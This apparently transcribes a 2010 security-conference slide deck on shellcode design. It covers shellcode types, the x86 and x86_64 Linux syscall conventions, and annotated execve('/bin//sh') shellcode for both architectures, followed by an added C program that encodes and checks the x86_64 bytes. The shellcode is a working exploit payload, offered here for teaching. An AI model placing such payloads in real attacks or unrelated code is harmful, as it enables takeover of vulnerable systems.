Design and Implementation of Shellcodes
Amr Ali
Cairo Security Camp 2010
How shellcodes work and how they are created.
What is a shellcode?
• It's bytecode
• Machine language
• Compiled Assembly source file
• A string of mostly unprintable characters
• Opcodes that the processor executes directly
• Mostly doesn't contain NULL bytes
• It is position independent

Types of Shellcodes
• Local shellcode
• Remote shellcode
• Download and execute shellcode
• Egg-hunt shellcode
• Omelet shellcode

Local shellcode
[Diagram] System + Normal User Privs -> Shellcode -> Vulnerable Root Process -> System + Root Privs

Remote shellcode
[Diagram] Network -> Shellcode -> Vulnerable Remote Service -> System + Root Privs

Download and execute shellcode
[Diagram] Any Medium -> Shellcode -> Vulnerable Anything -> System downloads and runs the Payload from the Internet

Egg-hunt shellcode
[Diagram] Vulnerable Process: the Egg-hunt Shellcode searches for the Shellcode, which lies at an unpredictable location

Omelet .....?

Omelet shellcode
[Diagram] Vulnerable Process: the Egg-hunt Shellcode locates several Shellcode Chunks scattered through the process memory

x86 and Linux kernel ABI
EAX : Holds the system call number.
EBX : Contains the value or address of the 1st argument to the system call.
ECX : Contains the value or address of the 2nd argument to the system call.
EDX : Contains the value or address of the 3rd argument to the system call.
EDI : General purpose register.
ESI : General purpose register.
EBP : Base Pointer register.
ESP : Stack Pointer register.
EIP : Instruction Pointer register.

x86_64 and Linux kernel ABI
RAX : Contains the system call number.
RBX : General purpose register.
RCX : General purpose register.
RDX : The 3rd argument for the system call.
RDI : The 1st argument for the system call.
RSI : The 2nd argument for the system call.
RBP : Base Pointer register.
RSP : Stack Pointer register.
RIP : Instruction Pointer register.
R8 : The 4th argument for the system call.
R9 : The 5th argument for the system call.
R10 : The 6th argument for the system call.
R11 – R15 : General purpose registers.
x86 shellcode
.global _start
_start:
cltd                  # 0x99       edx = 0 (sign-extends eax; assumes eax >= 0 on entry)
push %edx             # 0x52       NULL that terminates the path string
push $0x68732f2f      # 0x68 0x2f 0x2f 0x73 0x68   "//sh"
push $0x6e69622f      # 0x68 0x2f 0x62 0x69 0x6e   "/bin"  (stack now holds "/bin//sh\0")
movl %esp, %ebx       # 0x89 0xe3  ebx = filename (1st argument)
push %edx             # 0x52       argv[1] = NULL
push %ebx             # 0x53       argv[0] = filename
push %esp             # 0x54
pop %ecx              # 0x59       ecx = argv (2nd argument); edx is still NULL and serves as envp (3rd argument)
                      #            (corrected from the deck's "pop %edx" / 0x5a, which left ECX unset and pointed EDX at argv)
movb $0x0b, %al       # 0xb0 0x0b  eax = 11 = execve (assumes the upper bytes of eax are already zero)
int $0x80             # 0xcd 0x80

x86_64 shellcode
.global _start
_start:
cltd                             # 0x99       rdx = 0 (sign-extends eax; assumes eax >= 0 on entry)
push %rdx                        # 0x52       NULL that terminates the path string
movq $0x68732f6e69622f2f, %rbx   # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68   "//bin/sh" in little-endian byte order
push %rbx                        # 0x53
movq %rsp, %rdi                  # 0x48 0x89 0xe7   rdi = filename (1st argument)
push %rdx                        # 0x52       argv[1] = NULL
push %rdi                        # 0x57       argv[0] = filename
movq %rsp, %rsi                  # 0x48 0x89 0xe6   rsi = argv (2nd argument); rdx = envp = NULL (3rd argument)
push $0x3b                       # 0x6a 0x3b
pop %rax                         # 0x58       rax = 59 = execve (push/pop avoids the NULL bytes of a 32-bit mov)
syscall                          # 0x0f 0x05
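As an added example that is not part of the deck, the C program below assembles the x86_64 slide's bytes from its opcode comments and checks two properties the deck states: the absence of NULL bytes, and the '/'-padded 8-byte path immediate loaded into %rbx. The function names and the helper that reads the push/pop syscall number are my own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* x86_64 execve("//bin/sh") shellcode, typed in from the opcode comments on
   the deck's x86_64 slide (added example, not the deck's own file). */
static const unsigned char SC64[] = {
    0x99,                               /* cltd: rdx = 0 (assumes eax >= 0) */
    0x52,                               /* push %rdx: NULL after the path   */
    0x48, 0xbb, 0x2f, 0x2f, 0x62, 0x69, /* movq $"//bin/sh", %rbx           */
    0x6e, 0x2f, 0x73, 0x68,
    0x53,                               /* push %rbx                        */
    0x48, 0x89, 0xe7,                   /* movq %rsp, %rdi  (filename)      */
    0x52, 0x57,                         /* push %rdx; push %rdi             */
    0x48, 0x89, 0xe6,                   /* movq %rsp, %rsi  (argv)          */
    0x6a, 0x3b, 0x58,                   /* push $0x3b; pop %rax (execve)    */
    0x0f, 0x05                          /* syscall                          */
};

/* "Mostly doesn't contain NULL bytes": a 0x00 would end a str* copy early.
   Returns the index of the first 0x00, or -1 if there is none. */
long first_null_byte(const unsigned char *sc, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0) return (long)i;
    return -1;
}

/* Build the 64-bit immediate the x86_64 slide loads into %rbx: left-pad the
   path with '/' to exactly 8 bytes (extra slashes do not change the path), so
   the immediate needs no NULL. Byte 0 becomes the low byte. 0 if it cannot fit. */
uint64_t pack_path8(const char *path) {
    size_t n = strlen(path);
    if (n == 0 || n > 8) return 0;
    char buf[8];
    memset(buf, '/', sizeof buf);
    memcpy(buf + (8 - n), path, n);     /* "/bin/sh" -> "//bin/sh" */
    uint64_t imm = 0;
    for (int i = 0; i < 8; i++)
        imm |= (uint64_t)(unsigned char)buf[i] << (8 * i);
    return imm;
}

/* Recover the syscall number set by the "push $imm8; pop %rax" idiom
   (6a XX 58) on the x86_64 slide; -1 if that idiom is absent. */
int pushpop_syscall_number(const unsigned char *sc, size_t len) {
    for (size_t i = 0; i + 2 < len; i++)
        if (sc[i] == 0x6a && sc[i + 2] == 0x58) return sc[i + 1];
    return -1;
}
```

The same checks apply to the x86 slide's bytes, except that its syscall number comes from `movb $imm8, %al` (b0 XX) rather than the push/pop idiom.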
Information
• Smashing the stack for fun and profit, by Aleph1
  http://www.phrack.org/issues.html?issue=49&id=14
• Shellcode: the assembly cocktail, by Samy Bahra
  http://www.infosecwriters.com/hhworld/shellcode.txt
• The Shellcoder's Handbook

Thanks
Questions?
All presented material today will be available on my website.
http://amr-ali.co.cc